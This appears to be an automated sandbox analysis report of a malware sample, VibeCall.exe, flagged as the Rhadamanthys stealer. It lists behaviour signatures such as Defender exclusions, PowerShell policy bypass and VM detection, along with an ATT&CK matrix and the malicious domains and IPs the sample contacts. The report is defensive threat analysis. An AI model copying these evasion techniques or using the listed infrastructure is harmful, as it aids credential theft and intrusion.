                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_01187C40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,15_3_01187C40
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: VibeCall.exe, 00000000.00000003.2424272416.000002660AB5D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.2423489966.000002660AC91000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.2422432335.0000026603396000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.2424150879.000002660B102000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.2424889574.000002660B111000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.2422093515.000002660AC82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 0000001A.00000003.2564278865.0000000003250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.2559956742.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.2628800917.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000003.2635755732.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2577698366.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2643923171.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2644671152.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 0000001A.00000003.2564278865.0000000003250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.2559956742.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.2628800917.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000003.2635755732.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2577698366.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2643923171.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2644671152.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 32_2_0516AB70 socket,WSAGetLastError,SetHandleInformation,GetLastError,closesocket,bind,WSAGetLastError,32_2_0516AB70

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts141
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		11
                      Process Injection                      		111
                      Masquerading                      		21
                      Input Capture                      		1
                      System Time Discovery                      		Remote Services21
                      Input Capture                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      PowerShell                      		Boot or Logon Initialization Scripts1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		LSASS Memory361
                      Security Software Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)161
                      Virtualization/Sandbox Evasion                      		Security Account Manager1
                      Process Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive11
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Process Injection                      		NTDS161
                      Virtualization/Sandbox Evasion                      		Distributed Component Object ModelInput Capture12
                      Ingress Tool Transfer                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets1
                      Application Window Discovery                      		SSHKeylogging3
                      Non-Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information                      		Cached Domain Credentials1
                      System Network Configuration Discovery                      		VNCGUI Input Capture124
                      Application Layer Protocol                      		Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading                      		DCSync144
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1627611 Sample: VibeCall.exe Startdate: 02/03/2025 Architecture: WINDOWS Score: 99 57 pastebin.com 2->57 59 rustaisolutionnorisk.com 2->59 61 2 other IPs or domains 2->61 79 Suricata IDS alerts for network traffic 2->79 81 Found malware configuration 2->81 83 Yara detected RHADAMANTHYS Stealer 2->83 87 5 other signatures 2->87 10 VibeCall.exe 17 2->10         started        signatures3 85 Connects to a pastebin service (likely for C&C) 57->85 process4 dnsIp5 73 ip-api.com 208.95.112.1 TUT-ASUS United States 10->73 75 147.45.60.20 FREE-NET-ASFREEnetEU Russian Federation 10->75 77 2 other IPs or domains 10->77 49 C:\Users\user\videosolution_vibecall_b.exe, PE32 10->49 dropped 51 C:\Users\user\aisolution_vibecall_a.exe, PE32 10->51 dropped 53 C:\Users\...\soundsolution_vibecall_c.exe, PE32 10->53 dropped 55 C:\Users\...\contry_solution_vibecall_e.exe, PE32 10->55 dropped 93 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 10->93 95 Bypasses PowerShell execution policy 10->95 97 Drops PE files to the user root directory 10->97 99 Adds a directory exclusion to Windows Defender 10->99 15 aisolution_vibecall_a.exe 1 10->15         started        18 contry_solution_vibecall_e.exe 10->18         started        20 powershell.exe 23 10->20         started        22 4 other processes 10->22 file6 signatures7 process8 dnsIp9 101 Multi AV Scanner detection for dropped file 15->101 103 Switches to a custom stack to bypass stack traces 15->103 25 fontdrvhost.exe 15->25         started        29 WerFault.exe 2 15->29         started        31 WerFault.exe 2 15->31         started        33 fontdrvhost.exe 18->33         started        43 2 other processes 18->43 105 Loading BitLocker PowerShell Module 20->105 35 conhost.exe 20->35         started        63 pastebin.com 104.20.4.235, 443, 49740 CLOUDFLARENETUS United States 22->63 107 Antivirus detection for dropped file 22->107 37 conhost.exe 22->37         started        39 conhost.exe 22->39         started        41 WerFault.exe 22->41         started        signatures10 process11 dnsIp12 65 171.22.120.233 DEDIPATH-LLCUS Latvia 25->65 89 Performs DNS queries to domains with low reputation 25->89 91 Switches to a custom stack to bypass stack traces 25->91 45 fontdrvhost.exe 25->45         started        67 api.mirrow1-dell.xyz 33->67 69 api.mirrow1-dell.xyz 79.141.168.8 TELE-ASTeleAsiaLimitedHK Bulgaria 33->69 71 104.16.249.249 CLOUDFLARENETUS United States 33->71 signatures13 process14 process15 47 WerFault.exe 45->47         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.